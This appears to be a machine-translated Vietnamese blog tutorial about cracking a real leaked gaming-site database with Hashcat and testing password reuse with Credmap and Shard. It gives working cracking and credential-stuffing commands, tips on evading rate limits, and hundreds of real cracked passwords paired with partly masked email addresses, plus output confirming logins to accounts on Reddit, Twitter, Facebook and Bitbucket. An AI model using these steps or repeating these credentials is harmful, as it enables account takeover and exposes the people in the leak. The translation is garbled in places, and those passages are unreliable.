Trong một khảo sát gần đây của LastPass , nó đã được tiết lộ rằng:
Hơn 53% số người được hỏi thú nhận không thay đổi mật khẩu của họ trong 12 tháng qua … mặc dù có tin tức về việc vi phạm dữ liệu liên quan đến thỏa hiệp mật khẩu.
Mọi người chỉ đơn giản là không quan tâm để bảo vệ tốt hơn danh tính trực tuyến của họ và đánh giá thấp giá trị của họ đối với tin tặc. Tôi trở nên tò mò muốn biết (thực tế) có bao nhiêu tài khoản trực tuyến mà kẻ tấn công có thể thỏa hiệp từ một vi phạm dữ liệu, vì vậy tôi bắt đầu truy quét internet mở để tìm cơ sở dữ liệu bị rò rỉ.
Bước 1 Picking the Candidate (Tìm phạm vi tấn công)
Khi quyết định vi phạm để điều tra, tôi muốn một bộ dữ liệu gần đây cho phép hiểu chính xác về việc kẻ tấn công có thể đi được bao xa. Tôi đã giải quyết trên một trang web chơi game nhỏ bị vi phạm dữ liệu vào năm 2017 và toàn bộ cơ sở dữ liệu SQL của họ bị rò rỉ. Để bảo vệ người dùng và danh tính của họ, tôi sẽ không nêu tên trang web hoặc tiết lộ bất kỳ địa chỉ email nào được tìm thấy trong rò rỉ.
Bộ dữ liệu bao gồm khoảng 1.100 email duy nhất, tên người dùng, mật khẩu băm, muối và địa chỉ IP người dùng được phân tách bằng dấu hai chấm theo định dạng sau.
email:username:hashed_password:salt:ip_address
Bước 2 Cracking the Hashes (Bẻ khóa )
Quét mật khẩu được thiết kế để hoạt động như một chức năng một chiều: một hoạt động dễ thực hiện mà kẻ tấn công khó có thể đảo ngược. Đây là một loại mã hóa biến thông tin có thể đọc được (mật khẩu văn bản gốc) thành dữ liệu bị xáo trộn (băm). Điều này về cơ bản có nghĩa là tôi cần gỡ bỏ (bẻ khóa) chuỗi băm để tìm hiểu mật khẩu của mỗi người dùng bằng cách sử dụng công cụ băm băm khét tiếng Hashcat .
Được tạo bởi Jens “nguyên tử” Steube , Hashcat là tiện ích phục hồi mật khẩu nhanh nhất và tiên tiến nhất trên thế giới. Hashcat hiện cung cấp hỗ trợ cho hơn 200 thuật toán băm được tối ưu hóa cao như NetNTLMv2 , LastPass, WPA / WPA2và vốn được sử dụng bởi thuật toán được sử dụng bởi bộ dữ liệu chơi game mà tôi đã chọn. Không giống như Aircrack-ng và John the Ripper , Hashcat hỗ trợ các cuộc tấn công đoán mật khẩu dựa trên GPU, nhanh hơn theo cấp số nhân so với các cuộc tấn công dựa trên CPU.
Bước 3 Đưa các cuộc tấn công vào quan điểm
Nhiều nhà quản lý có thể đã cố gắng bẻ khóa WPA2 tại một số điểm trong những năm gần đây. Để cung cấp cho độc giả một số ý tưởng về các cuộc tấn dựa trên GPU nhanh hơn so với các cuộc tấn công dựa trên CPU, dưới đây là điểm chuẩn Aircrack-ng ( -S ) đối với các khóa WPA2 sử dụng CPU Intel i7 có trong hầu hết các máy tính xách tay hiện đại.
aircrack-ng -S
8560 k/s
Đó là 8,560 mật khẩu WPA2 cố gắng mỗi giây. Đối với một người không quen thuộc với các cuộc tấn công vũ phu, điều đó có vẻ như rất nhiều. Nhưng đây là điểm chuẩn Hashcat ( -b ) so với băm WPA2 ( -m 2500 ) bằng cách sử dụng GPU AMD cơ bản:
hashcat -b -m 2500
hashcat (v4.1.0) starting in benchmark mode...
Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)
Speed.Dev.#1.....: 155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1
Tương đương với 155,6 kH / s là 155.600 lần thử mật khẩu mỗi giây. Hãy tưởng tượng 18 CPU Intel i7 bắt buộc cùng một hàm băm – đó là tốc độ của một GPU.
Không phải tất cả các thuật toán mã hóa và băm cung cấp cùng một mức độ bảo vệ. Trên thực tế, hầu hết cung cấp sự bảo vệ rất kém trước các cuộc tấn công vũ phu như vậy. Sau khi phát hiện ra tập dữ liệu của 1.100 mật khẩu được băm đang sử dụng vốn được sử dụng của Diễn đàn, một nền tảng diễn đàn phổ biến, tôi đã chạy lại điểm chuẩn Hashcat bằng cách sử dụng mã băm ( -m 2711 ) tương ứng :
hashcat -b -m 2711
hashcat (v4.1.0) starting in benchmark mode...
Hashmode: 2711 - vBulletin >= v3.8.5
Speed.Dev.#1.....: 1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1
Đó là ước tính mật khẩu 1.949.600.000 (~ 2 tỷ) mỗi giây. Hy vọng rằng, điều này minh họa việc mọi người có GPU hiện đại dễ dàng bẻ khóa băm sau khi cơ sở dữ liệu bị rò rỉ.
Bước 4 Brute-Forcing the Hashes (Lộc các kết nối)
Có khá nhiều dữ liệu không cần thiết trong kết xuất SQL thô, như địa chỉ email và địa chỉ IP của người dùng. Mật khẩu và được lọc ra theo định dạng sau.
hashed_password:salt
Mật khẩu băm sau đó được đưa vào Hashcat bằng lệnh sau.
hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile
Tấn công từ điển hay “chế độ thẳng” được chỉ định bằng cách sử dụng đối số -a 0. Để cải thiện hiệu suất tổng thể của Hashcat, tôi thường đặt -w (hoặc –workload-profile) thành 4 , để tối đa hóa tốc độ bẻ khóa. Cuối cùng, đối số –potfile-path đã được sử dụng để lưu các giá trị băm bị bẻ khóa vào tệp đã chỉ định.
Sau khi thử hàng tá danh sách từ chứa hàng trăm triệu mật khẩu so với tập dữ liệu, tôi đã có thể bẻ khóa khoảng 330 (30%) trong số 1.100 băm trong vòng chưa đầy một giờ. Vẫn còn một chút không hài lòng, tôi đã thử nhiều tính năng cưỡng bức của Hashcat:
hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile
Ở đây tôi đang sử dụng cuộc tấn công Mặt nạ của Hashcat ( -a 3 ) và thử mọi chữ thường có sáu ký tự ( ? L ) có thể kết thúc bằng một số có hai chữ số ( ? D ). Nỗ lực này cũng đã hoàn thành trong một khoảng thời gian tương đối ngắn và bẻ khóa hơn 100 băm, đưa tổng số băm bị bẻ khóa lên chính xác là 475, khoảng 43% trong số 1.100 tập dữ liệu.
Sau khi nối lại các băm bị bẻ khóa với địa chỉ email tương ứng của chúng, tôi còn lại với 475 dòng dữ liệu sau đây.
******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ
Bước 5 Kiểm tra sử dụng lại mật khẩu
Như tôi đã đề cập, bộ dữ liệu này đã bị rò rỉ từ một trang web chơi game nhỏ, chưa biết. Bán các tài khoản chơi game này sẽ tạo ra rất ít giá trị cho một hacker. Các giá trị là ở mức độ thường xuyên những người dùng sử dụng lại tên tài khoản, email và mật khẩu trên các trang web phổ biến khác.
Để tìm ra điều đó, Credmap và Shard đã được sử dụng để tự động phát hiện việc sử dụng lại mật khẩu. Các công cụ này khá giống nhau nhưng tôi quyết định làm nổi bật cả hai vì những phát hiện của chúng khác nhau theo một số cách được trình bày chi tiết sau trong bài viết này.
Tùy chọn 1 Using Credmap (Sử dụng Credmap)
Credmap là một tập lệnh Python và không yêu cầu phụ thuộc. Đơn giản chỉ cần sao chép kho lưu trữ GitHub và thay đổi vào thư mục uy tín / để bắt đầu sử dụng nó.
git clone https://github.com/lightos/credmap
cd credmap
Đối số –list có thể được sử dụng để xem các trang web Credmap hiện hỗ trợ.
./credmap.py --list
. .IIIII .II
I123456IIII. I II . II..IIIIIIIIIIIIIIIIIIII
. .IIIIII II IIIIIIHUNTER2IIIII I.
.IIIII.III I IIIIIIIIIIIIIIIIIIIIIII
.IILOVEII II .IIIII IIIIIIIIIIII. I
IIIIII IIII I IISECRETIIIIIII I
.II IIIIIIIIIIIII IIIIIIIII
I. .IIIABC123IIII I II I
.IIII IIIIIIIIIIII . I
IIIII. IIIIII . I.
IIGODIII IIIII ..I II .
IIIIII IIII... IIII
IIII III. I IISEXII
III I I III
II I .
I
credmap v0.1-d862247 (https://github.com/lightos/credmap/)
- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- trakt.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com
Sử dụng đối số –load cho phép định dạng “tên người dùng: mật khẩu”. Credmap cũng hỗ trợ định dạng “tên người dùng | email: mật khẩu” cho các trang web chỉ cho phép đăng nhập bằng địa chỉ email. Điều này có thể được chỉ định bằng cách sử dụng đối số –format “u | e: p” .
./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com, instagram.com"
Trong các thử nghiệm của mình, tôi thấy rằng cả Groupon và Instagram đều chặn hoặc đưa vào danh sách đen địa chỉ IP của VPS của tôi sau vài phút sử dụng Credmap. Điều này chắc chắn là kết quả của hàng tá lần thử thất bại trong khoảng thời gian vài phút. Tôi quyết định bỏ qua ( –exclude ) các trang web này, nhưng một kẻ tấn công có động lực có thể tìm cách đơn giản giả mạo địa chỉ IP của họ trên mỗi mật khẩu cơ sở nỗ lực và hạn chế tỷ lệ yêu cầu của họ để tránh khả năng của một trang web để phát hiện các cuộc tấn công bằng mật khẩu đoán.
Kết quả của lệnh Credmap rất đáng ngạc nhiên:
[********:9v6Zyl1heT] on "Bitbucket"...
[********:allus82] on "Reddit"...
[********:Jesus4ever] on "Reddit"...
[********:Jesus4ever] on "Bitbucket"...
[********:s4mb4lb1J] on "Bitbucket"...
[********:xjsv12] on "Bitbucket"...
[********:rosied] on "Bitbucket"...
[********:xbox360] on "Microsoft Live Account"...
[********:seventeen17] on "Bitbucket"...
[********:starwars] on "Scribd"...
[********:Presario123] on "Bitbucket"...
[********:podpod] on "Bitbucket"...
[********:podpod] on "Microsoft Live Account"...
[********:for795] on "Bitbucket"...
[********:isbandia] on "Wikipedia"...
[********:isbandia] on "Bitbucket"...
[********:wtEq5n22aH] on "Scribd"...
[********:240sxse] on "Reddit"...
[********:warhammer40k5] on "Bitbucket"...
[********:abeeagle] on "Reddit"...
[********:99bottles] on "Reddit"...
[********:99bottles] on "Wunderlist"...
[********:99bottles] on "Microsoft Live Account"...
[********:Checkers12] on "Reddit"...
[********:Checkers12] on "Bitbucket"...
[********:morgan13] on "Pinterest"...
[********:greencar.] on "Microsoft Live Account"...
[********:Warzone1] on "Bitbucket"...
[********:o83bjJ1rzQ] on "Bitbucket"...
[********:kajfarik] on "Foursquare"...
[********:kajfarik] on "Bitbucket"...
[********:1324Michael1324] on "Reddit"...
[********:max1mili0n] on "Microsoft Live Account"...
[********:s8elpz7c] on "Microsoft Live Account"...
[********:hitman] on "Reddit"...
[********:u9Q98rtikC] on "Bitbucket"...
[********:ab1g0r] on "Bitbucket"...
[********:stingray951] on "Bitbucket"...
[********:tard] on "Bitbucket"...
[********:Pumpkin007] on "Bitbucket"...
[********:h8802123] on "Reddit"...
[********:ownership1] on "Bitbucket"...
[********:N289wewtzF] on "Bitbucket"...
[********:Hummer1234] on "Bitbucket"...
[********:igniter123] on "Reddit"...
[********:167706] on "Bitbucket"...
[********:12341234] on "Bitbucket"...
[********:sniper] on "Bitbucket"...
[********:1212111] on "Bitbucket"...
[********:element1] on "Bitbucket"...
[********:mrb1087410] on "Bitbucket"...
[********:3k3f6wJxnK] on "Bitbucket"...
[********:spy929] on "Bitbucket"...
[********:qy913zdXpN] on "Bitbucket"...
[********:E5jnhui83D] on "Bitbucket"...
[********:6qfu6oeI8V] on "Bitbucket"...
[********:Nd9nw88grB] on "Scribd"...
[********:REGan181] on "Bitbucket"...
[********:skuli2779] on "Scribd"...
[********:phalanx1] on "Foursquare"...
[********:ariel420] on "Microsoft Live Account"...
[********:SLOANE01] on "Bitbucket"...
[********:67thdtR8nP] on "Scribd"...
[********:bullets] on "Bitbucket"...
[********:flyboy21] on "Wunderlist"...
[********:pookieg] on "Reddit"...
[********:bella1811] on "Reddit"...
[********:jojo82] on "Foursquare"...
[********:nonoobs810] on "Microsoft Live Account"...
[********:maxima1231] on "Reddit"...
[********:maxima1231] on "Pinterest"...
[********:ai7o8Z8vxO] on "Scribd"...
[********:mustang1] on "Reddit"...
[********:M.ustang9939] on "Bitbucket"...
[********:Balingwenwen123] on "Bitbucket"...
[********:dragao] on "Bitbucket"...
[********:7egixeO38Q] on "Scribd"...
[********:astonm] on "Bitbucket"...
[********:Nascar2405] on "Foursquare"...
[********:Nascar2405] on "Microsoft Live Account"...
[********:carrie0530] on "Reddit"...
[********:F85wdvq3kX] on "Bitbucket"...
[********:A2w9taks7L] on "Scribd"...
[********:A2w9taks7L] on "Linkedin"...
[********:Hxopz542] on "Reddit"...
[********:hd070800] on "Pinterest"...
[********:hd070800] on "Bitbucket"...
[********:piper1956] on "Bitbucket"...
[********:123123qweqwe] on "Reddit"...
[********:xboxlive] on "Reddit"...
[********:xboxlive] on "Pinterest"...
[********:Xi%40oxiao123] on "Bitbucket"...
[********:metallica12] on "Bitbucket"...
[********:sianlaser12] on "Pinterest"...
[********:h8ep81knFR] on "Reddit"...
[********:plummer92] on "Reddit"...
[********:plummer92] on "Bitbucket"...
[********:8246jt] on "Reddit"...
[********:8246jt] on "Scribd"...
[********:271bEzxonZ] on "Bitbucket"...
[********:6911747] on "Scribd"...
[********:6911747] on "Bitbucket"...
[********:raejas11] on "Bitbucket"...
[********:d0bb3lts4lt0] on "Microsoft Live Account"...
[********:2yvpdl13CP] on "Scribd"...
[********:dodgers123] on "Bitbucket"...
[********:urbanus] on "Reddit"...
[********:0506571670] on "Foursquare"...
[********:gyqK8Giz1P] on "Bitbucket"...
[********:e6bnvVo67H] on "Bitbucket"...
[********:92k2cizCdP] on "Scribd"...
[********:drnCy43g4O] on "Reddit"...
[********:Ayrtonsenna1] on "Bitbucket"...
[********:aerielle] on "Microsoft Live Account"...
[********:12341234a] on "Reddit"...
[********:6Ibit6qp1F] on "Bitbucket"...
[********:5n6xcd6rPD] on "Scribd"...
[********:5n6xcd6rPD] on "Bitbucket"...
[********:Redalert1] on "Bitbucket"...
[********:2689874] on "Scribd"...
[********:2689874] on "Pinterest"...
[********:bma81092] on "Reddit"...
[********:bma81092] on "Bitbucket"...
[********:csibi2007] on "Reddit"...
[********:alterego] on "Bitbucket"...
[********:tournament] on "Bitbucket"...
[********:Lena2020] on "Pinterest"...
[********:Lena2020] on "Bitbucket"...
[********:alejandro] on "Scribd"...
[********:alejandro] on "Bitbucket"...
[********:Imtr0uble] on "Bitbucket"...
[********:sucette] on "Bitbucket"...
[********:pipQc5p24Q] on "Bitbucket"...
[********:moomoo] on "Pinterest"...
[********:N0t3p%40D%21] on "Scribd"...
[********:N0t3p%40D%21] on "Pinterest"...
[********:7bR9bft8cQ] on "Bitbucket"...
[********:puzzle] on "Bitbucket"...
[********:spartan117] on "Microsoft Live Account"...
[********:scooby1621] on "Microsoft Live Account"...
[********:mike1828] on "Microsoft Live Account"...
[********:fifer123] on "Microsoft Live Account"...
[********:e5Bo1fx3kF] on "Scribd"...
[********:monkey] on "Reddit"...
[********:darkstar] on "Bitbucket"...
[********:irzF9k6p1H] on "Reddit"...
[********:8yu9hkwV9Q] on "Scribd"...
[********:c0mmand] on "Bitbucket"...
[********:doppler] on "Reddit"...
[********:doppler] on "Scribd"...
[********:jh5thrwgefsdfs] on "Bitbucket"...
[********:roblox12] on "Bitbucket"...
[********:aqwzsxedc] on "Bitbucket"...
[********:12345tessi] on "Bitbucket"...
[********:helmond] on "Bitbucket"...
[********:Liam1123] on "Reddit"...
[********:liptoo98] on "Scribd"...
[********:b82olSn4yH] on "Bitbucket"...
[********:bossos2] on "Microsoft Live Account"...
[********:highjump] on "Bitbucket"...
[********:juhu1230] on "Reddit"...
[********:bepolite] on "Reddit"...
[********:M00nglum] on "Microsoft Live Account"...
[********:Adw2u1h3tO] on "Bitbucket"...
[********:Manly123] on "Bitbucket"...
[********:ragnarok01] on "Reddit"...
[********:useless] on "Pinterest"...
[********:starwars97] on "Reddit"...
[********:doodle] on "Bitbucket"...
[********:TYzt2013] on "Bitbucket"...
[********:Cheese77] on "Microsoft Live Account"...
[********:voxpi384] on "Bitbucket"...
[********:allah4life] on "Reddit"...
[********:allah4life] on "Wunderlist"...
[********:Jackal67] on "Reddit"...
[********:Jackal67] on "Bitbucket"...
[********:jasmine00] on "Bitbucket"...
[********:LXfn3BG952] on "Reddit"...
[********:alfiedog12] on "Pinterest"...
[********:25262928] on "Reddit"...
[********:25262928] on "Bitbucket"...
[********:Rat_isthebest] on "Foursquare"...
[********:Rat_isthebest] on "Scribd"...
[********:Rat_isthebest] on "Bitbucket"...
[********:Rat_isthebest] on "Wunderlist"...
[********:4kg83zRltG] on "Scribd"...
[********:4kg83zRltG] on "Bitbucket"...
[********:f1scher] on "Reddit"...
[********:o23jwr8uFD] on "Reddit"...
[********:o23jwr8uFD] on "Bitbucket"...
[********:ikbengek1] on "Pinterest"...
[********:Trustno1%21] on "Bitbucket"...
[********:trudat] on "Bitbucket"...
[********:tototomy] on "Bitbucket"...
[********:qwer1234] on "Bitbucket"...
[********:1391730] on "Foursquare"...
[********:robby123] on "Scribd"...
[********:actsman7] on "Bitbucket"...
[********:whodey] on "Wunderlist"...
[********:308184rt] on "Reddit"...
[********:108Resistance] on "Bitbucket"...
[********:yilin9409] on "Scribd"...
[********:joshuavi] on "Reddit"...
[********:damnkids] on "Bitbucket"...
[********:jbncde5hn6y5] on "Bitbucket"...
[********:roblox12] on "Reddit"...
[********:roblox12] on "Bitbucket"...
[********:azerty00] on "Reddit"...
[********:azerty00] on "Pinterest"...
[********:gymkhana] on "Bitbucket"...
[********:gymkhana] on "Wunderlist"...
[********:newgame] on "Reddit"...
[********:dacheng198] on "Scribd"...
[********:123456] on "Bitbucket"...
[********:syndrom02] on "Reddit"...
[********:Paintball1] on "Bitbucket"...
[********:4536729] on "Bitbucket"...
[********:rawtheme22] on "Reddit"...
[********:rawtheme22] on "Bitbucket"...
[********:sobaked123] on "Microsoft Live Account"...
[********:Thee1234] on "Bitbucket"...
[********:sersna7] on "Bitbucket"...
[********:indonesia2016] on "Scribd"...
[********:indonesia2016] on "Microsoft Live Account"...
[********:Ou6tlgr87N] on "Scribd"...
[********:sea2shell] on "Reddit"...
[********:01cs653] on "Reddit"...
[********:73icJf3ilZ] on "Scribd"...
[********:ndyr761pGO] on "Bitbucket"...
[********:prosk8ter] on "Bitbucket"...
[********:games%21%21%21] on "Pinterest"...
[********:games%21%21%21] on "Microsoft Live Account"...
[********:gt9800] on "Bitbucket"...
[********:mel4tipp] on "Microsoft Live Account"...
[********:mvp123] on "Reddit"...
[********:mvp123] on "Bitbucket"...
[********:3g82tafLbY] on "Bitbucket"...
[********:arturi09] on "Wunderlist"...
[********:arturi09] on "Microsoft Live Account"...
[********:092486] on "Bitbucket"...
[********:sappeps12345] on "Reddit"...
[********:1morerep] on "Bitbucket"...
[********:Finalfantasy89] on "Reddit"...
[********:Finalfantasy89] on "Bitbucket"...
[********:11%3D11bts] on "Scribd"...
Tất cả tên người dùng đã được điều chỉnh lại, nhưng chúng ta có thể thấy các tài khoản Reddit, Microsoft, Foursquare, Wunderlist và Scribd được báo cáo là có cùng tên người dùng: kết hợp mật khẩu như tập dữ liệu trang web chơi game nhỏ.
Tùy chọn 2 Sử dụng phân đoạn
Shard yêu cầu Java có thể không có trong Kali theo mặc định và có thể được cài đặt bằng lệnh bên dưới.
sudo apt-get install default-jre
Sau đó, tải xuống phiên bản mới nhất của Shard bằng lệnh wget .
wget 'https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar'
Giống như với Credmap, đối số –list có thể được sử dụng với Shard để xem các trang web được hỗ trợ của nó.
java -jar shard-1.5.jar --list
[+] Available modules:
[+] Facebook
[+] LinkedIn
[+] Reddit
[+] Twitter
[+] Instagram
[+] GitHub
[+] BitBucket
[+] Kijiji
[+] DigitalOcean
[+] Vimeo
[+] Laposte
[+] Dailymotion
Sử dụng Shard chỉ yêu cầu đối số –file để bắt đầu phát hiện sử dụng lại mật khẩu.
java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt
[+] Running in multi-user multi-password mode
[+] Parsed 475 credentials
[+] Running 11 modules
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:entern0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:0506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:roblox12 - Facebook, Twitter
[+] *******@hotmail.com:helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:074langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:0olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
